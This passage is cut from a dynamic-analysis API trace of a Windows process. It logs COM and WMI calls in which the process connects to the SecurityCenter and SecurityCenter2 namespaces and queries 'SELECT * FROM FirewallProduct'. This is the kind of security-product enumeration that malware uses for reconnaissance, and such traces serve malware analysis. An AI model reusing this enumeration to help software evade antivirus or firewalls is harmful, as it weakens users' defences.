[3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e39c | out: ppvObject=0x38e39c*=0x0) returned 0x80004002 [0235.271] WbemLocator:IUnknown:QueryInterface (in: This=0x5642970, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e34c | out: ppvObject=0x38e34c*=0x0) returned 0x80004002 [0235.271] WbemLocator:IUnknown:QueryInterface (in: This=0x5642970, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e358 | out: ppvObject=0x38e358*=0x0) returned 0x80004002 [0235.271] CoGetContextToken (in: pToken=0x38e3b8 | out: pToken=0x38e3b8) returned 0x0 [0235.271] CoGetContextToken (in: pToken=0x38e7cc | out: pToken=0x38e7cc) returned 0x0 [0235.271] WbemLocator:IUnknown:QueryInterface (in: This=0x5642970, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e84c | out: ppvObject=0x38e84c*=0x0) returned 0x80004002 [0235.271] WbemLocator:IUnknown:Release (This=0x5642970) returned 0x2 [0235.271] WbemLocator:IUnknown:Release (This=0x5642970) returned 0x1 [0235.271] CoGetContextToken (in: pToken=0x38ee4c | out: pToken=0x38ee4c) returned 0x0 [0235.271] CoGetContextToken (in: pToken=0x38edac | out: pToken=0x38edac) returned 0x0 [0235.271] WbemLocator:IUnknown:QueryInterface (in: This=0x5642970, riid=0x38ee7c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38ee78 | out: ppvObject=0x38ee78*=0x5642970) returned 0x0 [0235.271] WbemLocator:IUnknown:AddRef (This=0x5642970) returned 0x3 [0235.271] WbemLocator:IUnknown:Release (This=0x5642970) returned 0x2 [0235.271] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644458, puCount=0x38f008 | out: puCount=0x38f008*=0x2) returned 0x0 [0235.271] WbemDefPath:IWbemPath:GetText (in: This=0x5644458, lFlags=8, puBuffLength=0x38f004*=0x0, pszText=0x0 | out: puBuffLength=0x38f004*=0x18, pszText=0x0) returned 0x0 [0235.272] WbemDefPath:IWbemPath:GetText (in: This=0x5644458, lFlags=8, puBuffLength=0x38f004*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x38f004*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0235.272] CoCreateInstance (in: rclsid=0x6d5f3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d5f3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x38eea0 | out: ppv=0x38eea0*=0x5642950) returned 0x0 [0235.272] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5642950, strNetworkResource="\\\\.\\ROOT\\SecurityCenter", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x38ef54 | out: ppNamespace=0x38ef54*=0x563fa48) returned 0x0 [0235.453] WbemLocator:IUnknown:QueryInterface (in: This=0x563fa48, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edc4 | out: ppvObject=0x38edc4*=0x55c543c) returned 0x0 [0235.453] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x55c543c, pProxy=0x563fa48, pAuthnSvc=0x38ee14, pAuthzSvc=0x38ee10, pServerPrincName=0x38ee08, pAuthnLevel=0x38ee0c, pImpLevel=0x38edfc, pAuthInfo=0x38ee00, pCapabilites=0x38ee04 | out: pAuthnSvc=0x38ee14*=0xa, pAuthzSvc=0x38ee10*=0x0, pServerPrincName=0x38ee08, pAuthnLevel=0x38ee0c*=0x6, pImpLevel=0x38edfc*=0x2, pAuthInfo=0x38ee00, pCapabilites=0x38ee04*=0x1) returned 0x0 [0235.453] WbemLocator:IUnknown:Release (This=0x55c543c) returned 0x1 [0235.453] WbemLocator:IUnknown:QueryInterface (in: This=0x563fa48, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edb8 | out: ppvObject=0x38edb8*=0x55c545c) returned 0x0 [0235.453] WbemLocator:IUnknown:QueryInterface (in: This=0x563fa48, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eda4 | out: ppvObject=0x38eda4*=0x55c543c) returned 0x0 [0235.453] WbemLocator:IClientSecurity:SetBlanket (This=0x55c543c, pProxy=0x563fa48, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0235.454] WbemLocator:IUnknown:Release (This=0x55c543c) returned 0x2 [0235.454] WbemLocator:IUnknown:Release (This=0x55c545c) returned 0x1 [0235.454] CoTaskMemFree (pv=0x55fec78) [0235.454] WbemLocator:IUnknown:AddRef (This=0x563fa48) returned 0x2 [0235.454] WbemLocator:IUnknown:Release (This=0x5642950) returned 0x0 [0235.454] CoGetContextToken (in: pToken=0x38e2f8 | out: pToken=0x38e2f8) returned 0x0 [0235.454] CoGetContextToken (in: pToken=0x38e70c | out: pToken=0x38e70c) returned 0x0 [0235.454] WbemLocator:IUnknown:QueryInterface (in: This=0x563fa48, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e6a4 | out: ppvObject=0x38e6a4*=0x55c5444) returned 0x0 [0235.455] WbemLocator:IRpcOptions:Query (in: This=0x55c5444, pPrx=0x563aba8, dwProperty=2, pdwValue=0x38e798 | out: pdwValue=0x38e798) returned 0x80004002 [0235.455] WbemLocator:IUnknown:Release (This=0x55c5444) returned 0x2 [0235.455] CoGetContextToken (in: pToken=0x38ecdc | out: pToken=0x38ecdc) returned 0x0 [0235.455] CoGetContextToken (in: pToken=0x38ec3c | out: pToken=0x38ec3c) returned 0x0 [0235.455] WbemLocator:IUnknown:QueryInterface (in: This=0x563fa48, riid=0x38ed0c*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x38ebd8 | out: ppvObject=0x38ebd8*=0x563fa48) returned 0x0 [0235.455] WbemLocator:IUnknown:Release (This=0x563fa48) returned 0x2 [0235.455] SysStringLen (param_1=0x0) returned 0x0 [0235.455] CoGetContextToken (in: pToken=0x38ee0c | out: pToken=0x38ee0c) returned 0x0 [0235.455] IWbemServices:ExecQuery (in: This=0x563fa48, strQueryLanguage="WQL", strQuery="SELECT * FROM FirewallProduct", lFlags=16, pCtx=0x0, ppEnum=0x38f014 | out: ppEnum=0x38f014*=0x544efd0) returned 0x0 [0235.459] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee70 | out: ppvObject=0x38ee70*=0x544efd4) returned 0x0 [0235.459] IClientSecurity:QueryBlanket (in: This=0x544efd4, pProxy=0x544efd0, pAuthnSvc=0x38eec0, pAuthzSvc=0x38eebc, pServerPrincName=0x38eeb4, pAuthnLevel=0x38eeb8, pImpLevel=0x38eea8, pAuthInfo=0x38eeac, pCapabilites=0x38eeb0 | out: pAuthnSvc=0x38eec0*=0xa, pAuthzSvc=0x38eebc*=0x0, pServerPrincName=0x38eeb4, pAuthnLevel=0x38eeb8*=0x6, pImpLevel=0x38eea8*=0x2, pAuthInfo=0x38eeac, pCapabilites=0x38eeb0*=0x1) returned 0x0 [0235.460] IUnknown:Release (This=0x544efd4) returned 0x1 [0235.460] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee64 | out: ppvObject=0x38ee64*=0x55c4bec) returned 0x0 [0235.460] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee50 | out: ppvObject=0x38ee50*=0x544efd4) returned 0x0 [0235.460] IClientSecurity:SetBlanket (This=0x544efd4, pProxy=0x544efd0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0235.462] IUnknown:Release (This=0x544efd4) returned 0x2 [0235.462] WbemLocator:IUnknown:Release (This=0x55c4bec) returned 0x1 [0235.462] CoTaskMemFree (pv=0x55fed38) [0235.462] IUnknown:AddRef (This=0x544efd0) returned 0x2 [0235.463] CoGetContextToken (in: pToken=0x38e390 | out: pToken=0x38e390) returned 0x0 [0235.463] CoGetContextToken (in: pToken=0x38e7a4 | out: pToken=0x38e7a4) returned 0x0 [0235.463] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e73c | out: ppvObject=0x38e73c*=0x55c4bd4) returned 0x0 [0235.463] WbemLocator:IRpcOptions:Query (in: This=0x55c4bd4, pPrx=0x563abf0, dwProperty=2, pdwValue=0x38e830 | out: pdwValue=0x38e830) returned 0x80004002 [0235.463] WbemLocator:IUnknown:Release (This=0x55c4bd4) returned 0x2 [0235.463] CoGetContextToken (in: pToken=0x38ed74 | out: pToken=0x38ed74) returned 0x0 [0235.463] CoGetContextToken (in: pToken=0x38ecd4 | out: pToken=0x38ecd4) returned 0x0 [0235.463] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x38eda4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ec70 | out: ppvObject=0x38ec70*=0x544efd0) returned 0x0 [0235.464] IUnknown:Release (This=0x544efd0) returned 0x2 [0235.464] SysStringLen (param_1=0x0) returned 0x0 [0235.464] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644458, puCount=0x38f060 | out: puCount=0x38f060*=0x2) returned 0x0 [0235.464] WbemDefPath:IWbemPath:GetText (in: This=0x5644458, lFlags=4, puBuffLength=0x38f05c*=0x0, pszText=0x0 | out: puBuffLength=0x38f05c*=0x18, pszText=0x0) returned 0x0 [0235.464] WbemDefPath:IWbemPath:GetText (in: This=0x5644458, lFlags=4, puBuffLength=0x38f05c*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x38f05c*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0235.464] CoGetContextToken (in: pToken=0x38eeb4 | out: pToken=0x38eeb4) returned 0x0 [0235.464] IEnumWbemClassObject:Clone (in: This=0x544efd0, ppEnum=0x38f06c | out: ppEnum=0x38f06c*=0x544f098) returned 0x0 [0235.465] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef28 | out: ppvObject=0x38ef28*=0x544f09c) returned 0x0 [0235.465] IClientSecurity:QueryBlanket (in: This=0x544f09c, pProxy=0x544f098, pAuthnSvc=0x38ef78, pAuthzSvc=0x38ef74, pServerPrincName=0x38ef6c, pAuthnLevel=0x38ef70, pImpLevel=0x38ef60, pAuthInfo=0x38ef64, pCapabilites=0x38ef68 | out: pAuthnSvc=0x38ef78*=0xa, pAuthzSvc=0x38ef74*=0x0, pServerPrincName=0x38ef6c, pAuthnLevel=0x38ef70*=0x6, pImpLevel=0x38ef60*=0x2, pAuthInfo=0x38ef64, pCapabilites=0x38ef68*=0x1) returned 0x0 [0235.465] IUnknown:Release (This=0x544f09c) returned 0x1 [0235.465] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef1c | out: ppvObject=0x38ef1c*=0x55c563c) returned 0x0 [0235.466] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef08 | out: ppvObject=0x38ef08*=0x544f09c) returned 0x0 [0235.466] IClientSecurity:SetBlanket (This=0x544f09c, pProxy=0x544f098, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0235.467] IUnknown:Release (This=0x544f09c) returned 0x2 [0235.467] WbemLocator:IUnknown:Release (This=0x55c563c) returned 0x1 [0235.467] CoTaskMemFree (pv=0x55fed68) [0235.468] IUnknown:AddRef (This=0x544f098) returned 0x2 [0235.468] CoGetContextToken (in: pToken=0x38e438 | out: pToken=0x38e438) returned 0x0 [0235.468] CoGetContextToken (in: pToken=0x38e84c | out: pToken=0x38e84c) returned 0x0 [0235.468] IUnknown:QueryInterface (in: This=0x544f098, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e7e4 | out: ppvObject=0x38e7e4*=0x55c5624) returned 0x0 [0235.468] WbemLocator:IRpcOptions:Query (in: This=0x55c5624, pPrx=0x563ac80, dwProperty=2, pdwValue=0x38e8d8 | out: pdwValue=0x38e8d8) returned 0x80004002 [0235.468] WbemLocator:IUnknown:Release (This=0x55c5624) returned 0x2 [0235.469] CoGetContextToken (in: pToken=0x38ee1c | out: pToken=0x38ee1c) returned 0x0 [0235.469] CoGetContextToken (in: pToken=0x38ed7c | out: pToken=0x38ed7c) returned 0x0 [0235.469] IUnknown:QueryInterface (in: This=0x544f098, riid=0x38ee4c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ed18 | out: ppvObject=0x38ed18*=0x544f098) returned 0x0 [0235.469] IUnknown:Release (This=0x544f098) returned 0x2 [0235.469] SysStringLen (param_1=0x0) returned 0x0 [0235.469] IEnumWbemClassObject:Reset (This=0x544f098) returned 0x0 [0235.470] CoTaskMemAlloc (cb=0x4) returned 0x56429e0 [0235.470] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56429e0, puReturned=0x266c5e4 | out: apObjects=0x56429e0*=0x0, puReturned=0x266c5e4*=0x0) returned 0x1 [0235.471] CoTaskMemFree (pv=0x56429e0) [0235.471] CoGetContextToken (in: pToken=0x38ef90 | out: pToken=0x38ef90) returned 0x0 [0235.471] IUnknown:Release (This=0x544f098) returned 0x1 [0235.471] IUnknown:Release (This=0x544f098) returned 0x0 [0235.472] CoGetContextToken (in: pToken=0x38ef90 | out: pToken=0x38ef90) returned 0x0 [0235.472] IUnknown:Release (This=0x544efd0) returned 0x1 [0235.472] IUnknown:Release (This=0x544efd0) returned 0x0 [0235.474] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f088 | out: ppv=0x38f088*=0x6d0cac) returned 0x0 [0235.474] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f080 | out: pAptType=0x38f080*=1) returned 0x0 [0235.474] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f084 | out: ppvObject=0x38f084*=0x0) returned 0x80004002 [0235.474] IUnknown:Release (This=0x6d0cac) returned 0x1 [0235.475] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e9f0 | out: ppv=0x38e9f0*=0x56429e0) returned 0x0 [0235.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x56429e0, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ec08 | out: ppvObject=0x38ec08*=0x0) returned 0x80004002 [0235.476] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56429e0, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ec14 | out: ppvObject=0x38ec14*=0x56444c8) returned 0x0 [0235.476] WbemDefPath:IUnknown:Release (This=0x56429e0) returned 0x0 [0235.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x56444c8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e834 | out: ppvObject=0x38e834*=0x56444c8) returned 0x0 [0235.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x56444c8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e7e8 | out: ppvObject=0x38e7e8*=0x0) returned 0x80004002 [0235.476] WbemDefPath:IUnknown:AddRef (This=0x56444c8) returned 0x3 [0235.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x56444c8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e144 | out: ppvObject=0x38e144*=0x0) returned 0x80004002 [0235.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x56444c8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e0f4 | out: ppvObject=0x38e0f4*=0x0) returned 0x80004002 [0235.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x56444c8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e100 | out: ppvObject=0x38e100*=0x56429a0) returned 0x0 [0235.476] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56429a0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e108 | out: pCid=0x38e108*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0235.476] WbemDefPath:IUnknown:Release (This=0x56429a0) returned 0x3 [0235.477] CoGetContextToken (in: pToken=0x38e160 | out: pToken=0x38e160) returned 0x0 [0235.477] CoGetContextToken (in: pToken=0x38e574 | out: pToken=0x38e574) returned 0x0 [0235.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x56444c8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e5f4 | out: ppvObject=0x38e5f4*=0x0) returned 0x80004002 [0235.477] WbemDefPath:IUnknown:Release (This=0x56444c8) returned 0x2 [0235.477] WbemDefPath:IUnknown:Release (This=0x56444c8) returned 0x1 [0235.477] CoGetContextToken (in: pToken=0x38ef0c | out: pToken=0x38ef0c) returned 0x0 [0235.477] CoGetContextToken (in: pToken=0x38ee6c | out: pToken=0x38ee6c) returned 0x0 [0235.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x56444c8, riid=0x38ef3c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ef38 | out: ppvObject=0x38ef38*=0x56444c8) returned 0x0 [0235.477] WbemDefPath:IUnknown:AddRef (This=0x56444c8) returned 0x3 [0235.477] WbemDefPath:IUnknown:Release (This=0x56444c8) returned 0x2 [0235.477] WbemDefPath:IWbemPath:SetText (This=0x56444c8, uMode=0x4, pszPath="ROOT\\SecurityCenter2") returned 0x0 [0235.477] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x56444c8, puCount=0x38f0b0 | out: puCount=0x38f0b0*=0x2) returned 0x0 [0235.477] WbemDefPath:IWbemPath:GetText (in: This=0x56444c8, lFlags=4, puBuffLength=0x38f0ac*=0x0, pszText=0x0 | out: puBuffLength=0x38f0ac*=0x19, pszText=0x0) returned 0x0 [0235.477] WbemDefPath:IWbemPath:GetText (in: This=0x56444c8, lFlags=4, puBuffLength=0x38f0ac*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f0ac*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0235.477] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x56444c8, puCount=0x38f09c | out: puCount=0x38f09c*=0x2) returned 0x0 [0235.477] WbemDefPath:IWbemPath:GetText (in: This=0x56444c8, lFlags=4, puBuffLength=0x38f098*=0x0, pszText=0x0 | out: puBuffLength=0x38f098*=0x19, pszText=0x0) returned 0x0 [0235.477] WbemDefPath:IWbemPath:GetText (in: This=0x56444c8, lFlags=4, puBuffLength=0x38f098*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f098*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0235.477] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f02c | out: ppv=0x38f02c*=0x6d0cac) returned 0x0 [0235.478] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f024 | out: pAptType=0x38f024*=1) returned 0x0 [0235.478] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f028 | out: ppvObject=0x38f028*=0x0) returned 0x80004002 [0235.478] IUnknown:Release (This=0x6d0cac) returned 0x1 [0235.478] CoGetClassObject (in: rclsid=0x55b3f8c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ec48 | out: ppv=0x38ec48*=0x563ac98) returned 0x0 [0235.479] WbemLocator:IUnknown:QueryInterface (in: This=0x563ac98, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ee60 | out: ppvObject=0x38ee60*=0x0) returned 0x80004002 [0235.479] WbemLocator:IClassFactory:CreateInstance (in: This=0x563ac98, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee6c | out: ppvObject=0x38ee6c*=0x56429d0) returned 0x0 [0235.479] WbemLocator:IUnknown:Release (This=0x563ac98) returned 0x0 [0235.479] WbemLocator:IUnknown:QueryInterface (in: This=0x56429d0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ea8c | out: ppvObject=0x38ea8c*=0x56429d0) returned 0x0 [0235.479] WbemLocator:IUnknown:QueryInterface (in: This=0x56429d0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38ea40 | out: ppvObject=0x38ea40*=0x0) returned 0x80004002 [0235.479] WbemLocator:IUnknown:AddRef (This=0x56429d0) returned 0x3 [0235.479] WbemLocator:IUnknown:QueryInterface (in: This=0x56429d0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e39c | out: ppvObject=0x38e39c*=0x0) returned 0x80004002 [0235.479] WbemLocator:IUnknown:QueryInterface (in: This=0x56429d0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e34c | out: ppvObject=0x38e34c*=0x0) returned 0x80004002 [0235.479] WbemLocator:IUnknown:QueryInterface (in: This=0x56429d0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 